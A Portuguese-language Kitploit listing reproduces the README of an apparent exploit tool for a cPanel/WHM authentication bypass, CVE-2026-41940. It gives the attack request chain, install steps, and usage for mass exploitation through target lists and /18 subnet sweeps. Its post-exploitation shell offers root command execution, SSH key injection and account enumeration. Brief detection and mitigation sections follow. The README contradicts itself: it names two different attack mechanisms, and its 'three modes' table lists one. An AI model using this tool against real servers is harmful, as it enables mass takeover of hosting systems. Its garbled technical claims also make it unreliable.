Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-41940 — CVE-2026-41940 — Bypass de Autenticação cPanel/WHM Por Dr.Anach, injeção de CRLF no manipulador de autenticação Basic do `cpsrvd` → acesso não autenticado à API WHM → RCE como root. Todos os cPanel desde v11.40 afetados. | Kitploit
Ferramentas/GitHubGitHub/anach-ai/cve-2026-41940
Autenticação e AutorizaçãoEscalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoMovimento LateralExploração de Aplicações WebPós-ExploraçãoTestes de PenetraçãoComando e ControleRed Teaming
GitHubanach-ai/cve-2026-41940
4há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-41940

CVE-2026-41940 — Bypass de Autenticação cPanel/WHM Por Dr.Anach, injeção de CRLF no manipulador de autenticação Basic do `cpsrvd` → acesso não autenticado à API WHM → RCE como root. Todos os cPanel desde v11.40 afetados.

Ver Repositório

CVE-2026-41940 — Bypass de Autenticação cPanel/WHM

Autor: Dr.Anach | Contato: @dranach | Licença: MIT


Visão Geral

Injeção CRLF no manipulador de autenticação Basic do cpsrvd → acesso não autenticado à API WHM → RCE como root. Todos os cPanel desde v11.40 afetados.

Cadeia de Ataque

#EtapaRequisição
1Mint sessionGET /login/?user=root
2Injeção CRLFAuthorization: Basic <base64> — a senha carrega payload \r\n
3Promoção de cacheGET /cpsess<ID>/login/?login_only=1
4ExecutarGET /cpsess<ID>/execute/API/func

Instalação

root@kitploit:~
pip install requests colorama

Abaixo está o README.md final — amigável, prático e focado em fazer o trabalho.


Exploit de Bypass de Autenticação cPanel — CVE-2026-41940

Autor: Dr.Anach · Telegram: @dranach
Versão: 2.0.0
Licença: Apenas para testes de segurança autorizados


O Que Isso Faz

Explora o CVE-2026-41940, um bypass de autenticação no cPanel & WHM (versões 11.x até 106.x). A vulnerabilidade permite que um atacante não autenticado acesse endpoints restritos — incluindo a função de redefinição de senha — enviando um cabeçalho Host malicioso apontando para um servidor controlado pelo atacante.

Vem com três modos:

ModoFlagO que
Alvo único-tTesta um IP ou domínio

Instalação

Requisitos

  • Python 3.7+ (testado no Windows, Linux, macOS)
  • Biblioteca requests
root@kitploit:~
pip install requests

Nenhuma outra dependência. A expansão CIDR usa o módulo ipaddress embutido do Python — nada extra para instalar no Windows.


Início Rápido

Testar um único alvo

root@kitploit:~
python main.py -t example.com
python main.py -t 192.168.1.100

Testar uma lista de alvos (um por linha)

root@kitploit:~
python main.py --batch targets.txt --threads 50

Formato targets.txt:

root@kitploit:~
192.168.1.100
example.com
192.168.1.101
example.org
192.168.1.102

Escanear uma sub-rede inteira (CIDR)

root@kitploit:~
python main.py --port-scan 192.168.128.0/18 --threads 100 --timeout 5

Isso expande 192.168.128.0/18 (16.384 IPs), executa uma verificação rápida de porta em cada um e só tenta exploração contra hosts onde a porta 2087 (cPanel/WHM) está aberta.


Opções Completas

root@kitploit:~
  -t, --target        Alvo único (IP ou domínio)
  --batch FILE        Arquivo com alvos (um por linha)
  --port-scan CIDR    Intervalo CIDR para escanear (ex.: 192.168.128.0/18)
  -p, --port          Porta alvo (padrão: 2087)
  --ssl               Usar HTTPS (padrão: HTTP)
  --timeout SEC       Timeout de conexão em segundos (padrão: 10)
  --threads N         Máximo de threads concorrentes (padrão: 50)
  --proxy PROXY       Proxy HTTP (ex.: http://127.0.0.1:8080)
  -v, --verbose       Saída detalhada com informações de debug
  --no-banner         Suprimir banner
  --version           Mostrar versão

Entendendo a Saída

root@kitploit:~
[+] 192.168.130.45:2087 — VULNERÁVEL!
    → URL de redefinição de senha: http://192.168.130.45:2087/reset?token=abc123
    → Tempo de resposta: 1.23s

[-] 192.168.131.10:2087 — Não vulnerável
    → Motivo: Nenhum endpoint de redefinição de senha encontrado

[!] 192.168.129.22:2087 — Erro: Conexão recusada

Os resultados salvos como JSON são estruturados por host com status de vulnerabilidade, tokens extraídos e detalhes brutos da resposta.


Exemplo Prático: Escaneando um /18 no Windows

O cenário pelo qual você provavelmente está aqui:

root@kitploit:~
python main.py --port-scan 192.168.128.0/18 -p 2087 --threads 100 --timeout 5 -v

Como funciona:

  1. Expande 192.168.128.0/18 → 16.384 IPs internamente
  2. Pré-filtra com uma varredura TCP connect rápida na porta 2087 (ignora hosts mortos)
  3. Explora apenas hosts com porta aberta
  4. Relata hosts vulneráveis com tokens de redefinição extraídos

Dicas de threading:

  • --threads 100 funciona bem (respeita os limites padrão de sockets)
  • Para varreduras mais rápidas em boas conexões: --threads 200
  • Se encontrar limitação de taxa: reduza para --threads 30 e aumente --timeout

CVSS e Risco

CVSS 9.1 (Crítico) — Nenhuma autenticação necessária, nenhuma interação do usuário, baixa complexidade.

Impacto

  • Redefinição de senha não autorizada para qualquer conta cPanel
  • Assunção total da conta
  • Escalação de privilégio de limitado para administrador em algumas configurações

Remediação

  • Atualizar cPanel/WHM para a versão corrigida mais recente
  • Validar cabeçalhos Host no lado do servidor
  • Restringir acesso WHM por IP quando possível

Legal

Esta ferramenta é apenas para avaliações de segurança autorizadas. Você deve ser proprietário dos alvos ou ter permissão por escrito do proprietário antes de testar. Os autores não assumem nenhuma responsabilidade por uso indevido.

Comandos do Shell Interativo

root@kitploit:~
help       Mostrar comandos
info       Informações do servidor
passwd     Alterar senha
accounts   Listar contas cPanel
enum       Enumeração completa
shell      Executar comando do sistema
ssh-add    Injetar chave SSH
exec       Executar one-liner Python
exit       Sair

Detecção

Verificar arquivos de sessão:

root@kitploit:~
ls -la /var/cpanel/sessions/raw/
ls -la /var/cpanel/sessions/cache/

Logs suspeitos em /usr/local/cpanel/logs/access_log:

root@kitploit:~
/login/?user=root        → mint session
/login/?user=root        → injeção CRLF
/cpsess*/login/?login_only=1  → promoção de cache
/cpsess*/execute/*       → abuso de API

Mitigação

root@kitploit:~
# 1. Aplicar patch para a build corrigida
# 2. Rotacionar todas as senhas e chaves SSH
# 3. Limpar sessões
rm -rf /var/cpanel/sessions/raw/*
rm -rf /var/cpanel/sessions/cache/*
systemctl restart cpanel

Créditos

  • Vulnerabilidade: Sina Kheirkhah / watchTowr Labs
  • Framework: Dr.Anach (@dranach)
Baixar ferramenta
Arquivo em lote--batchCarrega uma lista de alvos de um arquivo
Varredura CIDR--port-scanExpande uma sub-rede e testa cada host ativo